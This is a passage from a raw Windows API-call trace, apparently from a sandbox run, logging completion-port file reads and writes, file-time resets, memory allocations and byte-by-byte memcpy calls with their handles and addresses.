lpOverlapped=0x2ccfc58) returned 1 [0095.728] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0095.736] GetLastError () returned 0x3e5 [0095.736] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.784] ReadFile (in: hFile=0x3d4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0095.793] GetLastError () returned 0x3e5 [0095.793] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.796] SetFileTime (hFile=0x3d0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0095.796] CloseHandle (hObject=0x3d0) returned 1 [0095.797] free (_Block=0x20ebde0) [0095.797] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff) Thread: id = 13 os_tid = 0xfa8 [0072.121] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.610] ReadFile (in: hFile=0x394, lpBuffer=0x206b894, nNumberOfBytesToRead=0x133a2, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0076.612] GetLastError () returned 0x3e5 [0076.612] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.613] SetFileTime (hFile=0x394, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.613] CloseHandle (hObject=0x394) returned 1 [0076.618] free (_Block=0x206b860) [0076.618] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.622] SetFileTime (hFile=0x394, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.622] CloseHandle (hObject=0x394) returned 1 [0076.627] free (_Block=0x206b860) [0076.627] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.679] memcpy (in: _Dst=0x41cfdc, _Src=0x2e0f9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0076.679] memcpy (in: _Dst=0x41cfde, _Src=0x2e0f96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0076.679] memcpy (in: _Dst=0x41cfbc, _Src=0x2e0f98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.679] memcpy (in: _Dst=0x41cfbc, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.679] memcpy (in: _Dst=0x2e0f9e8, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x2e0f9e8) returned 0x2e0f9e8 [0076.679] memcpy (in: _Dst=0x2e0fa9c, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x2e0fa9c) returned 0x2e0fa9c [0076.679] memcpy (in: _Dst=0x2e0fabc, _Src=0x2e0fc70, _Size=0x10 | out: _Dst=0x2e0fabc) returned 0x2e0fabc [0076.679] memcpy (in: _Dst=0x2e0f890, _Src=0x2e0fa9c, _Size=0x30 | out: _Dst=0x2e0f890) returned 0x2e0f890 [0076.680] memcpy (in: _Dst=0x2e0fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2e0fde8) returned 0x2e0fde8 [0076.680] memcpy (in: _Dst=0x206b89e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89e) returned 0x206b89e [0076.680] memcpy (in: _Dst=0x206b89f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89f) returned 0x206b89f [0076.680] memcpy (in: _Dst=0x206b8a0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a0) returned 0x206b8a0 [0076.680] memcpy (in: _Dst=0x206b8a1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a1) returned 0x206b8a1 [0076.680] memcpy (in: _Dst=0x206b8a2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a2) returned 0x206b8a2 [0076.681] memcpy (in: _Dst=0x206b8a3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a3) returned 0x206b8a3 [0076.681] memcpy (in: _Dst=0x206b8a4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a4) returned 0x206b8a4 [0076.681] memcpy (in: _Dst=0x206b8a5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a5) returned 0x206b8a5 [0076.681] memcpy (in: _Dst=0x206b8a6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a6) returned 0x206b8a6 [0076.681] memcpy (in: _Dst=0x206b8a7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a7) returned 0x206b8a7 [0076.681] memcpy (in: _Dst=0x206b8a8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a8) returned 0x206b8a8 [0076.681] memcpy (in: _Dst=0x206b8a9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a9) returned 0x206b8a9 [0076.682] memcpy (in: _Dst=0x206b8aa, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8aa) returned 0x206b8aa [0076.682] memcpy (in: _Dst=0x206b8ab, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ab) returned 0x206b8ab [0076.682] memcpy (in: _Dst=0x206b8ac, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ac) returned 0x206b8ac [0076.682] memcpy (in: _Dst=0x206b8ad, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ad) returned 0x206b8ad [0076.682] memcpy (in: _Dst=0x206b8ae, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ae) returned 0x206b8ae [0076.682] memcpy (in: _Dst=0x206b8af, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8af) returned 0x206b8af [0076.683] memcpy (in: _Dst=0x206b8b0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b0) returned 0x206b8b0 [0076.683] memcpy (in: _Dst=0x206b8b1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b1) returned 0x206b8b1 [0076.683] memcpy (in: _Dst=0x206b8b2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b2) returned 0x206b8b2 [0076.683] memcpy (in: _Dst=0x206b8b3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b3) returned 0x206b8b3 [0076.683] memcpy (in: _Dst=0x206b8b4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b4) returned 0x206b8b4 [0076.683] memcpy (in: _Dst=0x206b8b5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b5) returned 0x206b8b5 [0076.683] memcpy (in: _Dst=0x206b8b6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b6) returned 0x206b8b6 [0076.684] memcpy (in: _Dst=0x206b8b7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b7) returned 0x206b8b7 [0076.684] memcpy (in: _Dst=0x206b8b8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b8) returned 0x206b8b8 [0076.684] memcpy (in: _Dst=0x206b8b9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b9) returned 0x206b8b9 [0076.684] memcpy (in: _Dst=0x206b8ba, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ba) returned 0x206b8ba [0076.684] memcpy (in: _Dst=0x206b8bb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bb) returned 0x206b8bb [0076.684] memcpy (in: _Dst=0x206b8bc, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bc) returned 0x206b8bc [0076.685] memcpy (in: _Dst=0x206b8bd, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bd) returned 0x206b8bd [0076.685] memcpy (in: _Dst=0x206b8be, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8be) returned 0x206b8be [0076.685] memcpy (in: _Dst=0x206b8bf, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bf) returned 0x206b8bf [0076.685] memcpy (in: _Dst=0x206b8c0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c0) returned 0x206b8c0 [0076.685] memcpy (in: _Dst=0x206b8c1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c1) returned 0x206b8c1 [0076.685] memcpy (in: _Dst=0x206b8c2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c2) returned 0x206b8c2 [0076.686] memcpy (in: _Dst=0x206b8c3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c3) returned 0x206b8c3 [0076.686] memcpy (in: _Dst=0x206b8c4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c4) returned 0x206b8c4 [0076.686] memcpy (in: _Dst=0x206b8c5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c5) returned 0x206b8c5 [0076.686] memcpy (in: _Dst=0x206b8c6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c6) returned 0x206b8c6 [0076.686] memcpy (in: _Dst=0x206b8c7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c7) returned 0x206b8c7 [0076.686] memcpy (in: _Dst=0x206b8c8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c8) returned 0x206b8c8 [0076.686] memcpy (in: _Dst=0x206b8c9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c9) returned 0x206b8c9 [0076.687] memcpy (in: _Dst=0x206b8ca, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ca) returned 0x206b8ca [0076.687] memcpy (in: _Dst=0x206b8cb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8cb) returned 0x206b8cb [0076.687] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.687] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.687] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.688] free (_Block=0x2060778) [0076.688] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.688] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.688] free (_Block=0x2062da0) [0076.689] free (_Block=0x53fcc0) [0076.689] free (_Block=0x2062eb8) [0076.689] WriteFile (in: hFile=0x3a0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0076.690] GetLastError () returned 0x3e5 [0076.690] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.746] WriteFile (in: hFile=0x3a8, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0076.747] GetLastError () returned 0x3e5 [0076.747] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.761] WriteFile (in: hFile=0x3a0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0076.761] GetLastError () returned 0x3e5 [0076.761] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.775] SetFileTime (hFile=0x3a4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.776] CloseHandle (hObject=0x3a4) returned 1 [0076.781] free (_Block=0x20abae0) [0076.784] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.786] WriteFile (in: hFile=0x3ac, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0076.786] GetLastError () returned 0x3e5 [0076.786] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.879] ReadFile (in: hFile=0x3b0, lpBuffer=0x39800ec, nNumberOfBytesToRead=0x1162, lpNumberOfBytesRead=0x0, lpOverlapped=0x39800b8 | out: lpBuffer=0x39800ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x39800b8) returned 1 [0076.880] GetLastError () returned 0x3e5 [0076.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.881] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.881] CloseHandle (hObject=0x3b0) returned 1 [0076.887] free (_Block=0x39800b8) [0076.894] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.962] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.962] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.963] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.963] free (_Block=0x2060778) [0076.963] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.963] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.964] free (_Block=0x2062da0) [0076.964] free (_Block=0x53fcc0) [0076.965] free (_Block=0x2062eb8) [0076.965] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0076.965] GetLastError () returned 0x3e5 [0076.965] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0076.974] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0076.975] GetLastError () returned 0x3e5 [0076.975] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.029] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.029] GetLastError () returned 0x3e5 [0077.029] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.029] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.029] CloseHandle (hObject=0x3b4) returned 1 [0077.033] free (_Block=0x206b860) [0077.033] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.035] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.035] CloseHandle (hObject=0x3b4) returned 1 [0077.037] free (_Block=0x206b860) [0077.038] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0077.224] memcpy (in: _Dst=0x41cfdc, _Src=0x2e0f9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0077.224] memcpy (in: _Dst=0x41cfde, _Src=0x2e0f96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0077.225] memcpy (in: _Dst=0x41cfbc, _Src=0x2e0f98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.225] memcpy (in: _Dst=0x41cfbc, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.225] memcpy (in: _Dst=0x2e0f9e8, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x2e0f9e8) returned 0x2e0f9e8 [0077.225] memcpy (in: _Dst=0x2e0fa9c, _Src=0x2e0fa50, _Size=0x20 | out: _Dst=0x2e0fa9c) returned 0x2e0fa9c [0077.225] memcpy (in: _Dst=0x2e0fabc, _Src=0x2e0fc70, _Size=0x10 | out: _Dst=0x2e0fabc) returned 0x2e0fabc [0077.225] memcpy (in: _Dst=0x2e0f890, _Src=0x2e0fa9c, _Size=0x30 | out: _Dst=0x2e0f890) returned 0x2e0f890 [0077.225] memcpy (in: _Dst=0x2e0fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2e0fde8) returned 0x2e0fde8 [0077.225] memcpy (in: _Dst=0x206b896, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b896) returned 0x206b896 [0077.225] memcpy (in: _Dst=0x206b897, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b897) returned 0x206b897 [0077.225] memcpy (in: _Dst=0x206b898, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b898) returned 0x206b898 [0077.225] memcpy (in: _Dst=0x206b899, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b899) returned 0x206b899 [0077.225] memcpy (in: _Dst=0x206b89a, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89a) returned 0x206b89a [0077.225] memcpy (in: _Dst=0x206b89b, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89b) returned 0x206b89b [0077.225] memcpy (in: _Dst=0x206b89c, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89c) returned 0x206b89c [0077.225] memcpy (in: _Dst=0x206b89d, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89d) returned 0x206b89d [0077.225] memcpy (in: _Dst=0x206b89e, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89e) returned 0x206b89e [0077.225] memcpy (in: _Dst=0x206b89f, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b89f) returned 0x206b89f [0077.225] memcpy (in: _Dst=0x206b8a0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a0) returned 0x206b8a0 [0077.225] memcpy (in: _Dst=0x206b8a1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a1) returned 0x206b8a1 [0077.225] memcpy (in: _Dst=0x206b8a2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a2) returned 0x206b8a2 [0077.225] memcpy (in: _Dst=0x206b8a3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a3) returned 0x206b8a3 [0077.225] memcpy (in: _Dst=0x206b8a4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a4) returned 0x206b8a4 [0077.226] memcpy (in: _Dst=0x206b8a5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a5) returned 0x206b8a5 [0077.226] memcpy (in: _Dst=0x206b8a6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a6) returned 0x206b8a6 [0077.226] memcpy (in: _Dst=0x206b8a7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a7) returned 0x206b8a7 [0077.226] memcpy (in: _Dst=0x206b8a8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a8) returned 0x206b8a8 [0077.226] memcpy (in: _Dst=0x206b8a9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8a9) returned 0x206b8a9 [0077.226] memcpy (in: _Dst=0x206b8aa, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8aa) returned 0x206b8aa [0077.226] memcpy (in: _Dst=0x206b8ab, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ab) returned 0x206b8ab [0077.226] memcpy (in: _Dst=0x206b8ac, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ac) returned 0x206b8ac [0077.226] memcpy (in: _Dst=0x206b8ad, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ad) returned 0x206b8ad [0077.226] memcpy (in: _Dst=0x206b8ae, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ae) returned 0x206b8ae [0077.226] memcpy (in: _Dst=0x206b8af, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8af) returned 0x206b8af [0077.226] memcpy (in: _Dst=0x206b8b0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b0) returned 0x206b8b0 [0077.226] memcpy (in: _Dst=0x206b8b1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b1) returned 0x206b8b1 [0077.226] memcpy (in: _Dst=0x206b8b2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b2) returned 0x206b8b2 [0077.226] memcpy (in: _Dst=0x206b8b3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b3) returned 0x206b8b3 [0077.226] memcpy (in: _Dst=0x206b8b4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b4) returned 0x206b8b4 [0077.226] memcpy (in: _Dst=0x206b8b5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b5) returned 0x206b8b5 [0077.226] memcpy (in: _Dst=0x206b8b6, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b6) returned 0x206b8b6 [0077.226] memcpy (in: _Dst=0x206b8b7, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b7) returned 0x206b8b7 [0077.226] memcpy (in: _Dst=0x206b8b8, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b8) returned 0x206b8b8 [0077.226] memcpy (in: _Dst=0x206b8b9, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8b9) returned 0x206b8b9 [0077.227] memcpy (in: _Dst=0x206b8ba, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8ba) returned 0x206b8ba [0077.227] memcpy (in: _Dst=0x206b8bb, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bb) returned 0x206b8bb [0077.227] memcpy (in: _Dst=0x206b8bc, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bc) returned 0x206b8bc [0077.227] memcpy (in: _Dst=0x206b8bd, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bd) returned 0x206b8bd [0077.227] memcpy (in: _Dst=0x206b8be, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8be) returned 0x206b8be [0077.227] memcpy (in: _Dst=0x206b8bf, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8bf) returned 0x206b8bf [0077.227] memcpy (in: _Dst=0x206b8c0, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c0) returned 0x206b8c0 [0077.227] memcpy (in: _Dst=0x206b8c1, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c1) returned 0x206b8c1 [0077.227] memcpy (in: _Dst=0x206b8c2, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c2) returned 0x206b8c2 [0077.227] memcpy (in: _Dst=0x206b8c3, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c3) returned 0x206b8c3 [0077.227] memcpy (in: _Dst=0x206b8c4, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c4) returned 0x206b8c4 [0077.227] memcpy (in: _Dst=0x206b8c5, _Src=0x2e0fbdc, _Size=0x1 | out: _Dst=0x206b8c5) returned 0x206b8c5 [0077.227] memcpy (in: _Dst=0x206b8c6, _Src=0x2e0fbdc, 